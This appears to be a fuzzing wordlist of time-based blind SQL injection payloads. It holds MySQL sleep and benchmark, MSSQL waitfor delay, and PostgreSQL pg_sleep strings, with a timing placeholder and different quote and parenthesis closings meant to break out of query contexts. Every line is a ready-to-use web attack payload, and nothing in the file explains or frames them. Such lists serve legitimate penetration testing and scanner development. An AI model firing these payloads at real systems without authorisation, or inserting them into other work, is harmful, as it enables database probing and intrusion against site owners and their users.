sleep(__TIME__)#
1+and+sleep(__TIME__)#
"+and+sleep(__TIME__)="
'+and+sleep(__TIME__)='
1)+and+sleep(__TIME__)#
")+and+sleep(__TIME__)="
')+and+sleep(__TIME__)='
1))+and+sleep(__TIME__)#
"))+and+sleep(__TIME__)="
'))+and+sleep(__TIME__)='
;waitfor+delay+'0:0:__TIME__'--
);waitfor+delay+'0:0:__TIME__'--
';waitfor+delay+'0:0:__TIME__'--
";waitfor+delay+'0:0:__TIME__'--
');waitfor+delay+'0:0:__TIME__'--
");waitfor+delay+'0:0:__TIME__'--
));waitfor+delay+'0:0:__TIME__'--
'));waitfor+delay+'0:0:__TIME__'--
"));waitfor+delay+'0:0:__TIME__'--
benchmark(10000000,MD5(1))#
1+and+benchmark(10000000,MD5(1))#
"+and+benchmark(10000000,MD5(1))#
'+and+benchmark(10000000,MD5(1))#
1)+and+benchmark(10000000,MD5(1))#
")+and+benchmark(10000000,MD5(1))#
')+and+benchmark(10000000,MD5(1))#
1))+and+benchmark(10000000,MD5(1))#
"))+and+benchmark(10000000,MD5(1))#
'))+and+benchmark(10000000,MD5(1))#
pg_sleep(__TIME__)--
1+and+pg_sleep(__TIME__)--
"+and+pg_sleep(__TIME__)--
'+and+pg_sleep(__TIME__)--
1)+and+pg_sleep(__TIME__)--
")+and+pg_sleep(__TIME__)--
')+and+pg_sleep(__TIME__)--
1))+and+pg_sleep(__TIME__)--
"))+and+pg_sleep(__TIME__)--
'))+and+pg_sleep(__TIME__)--
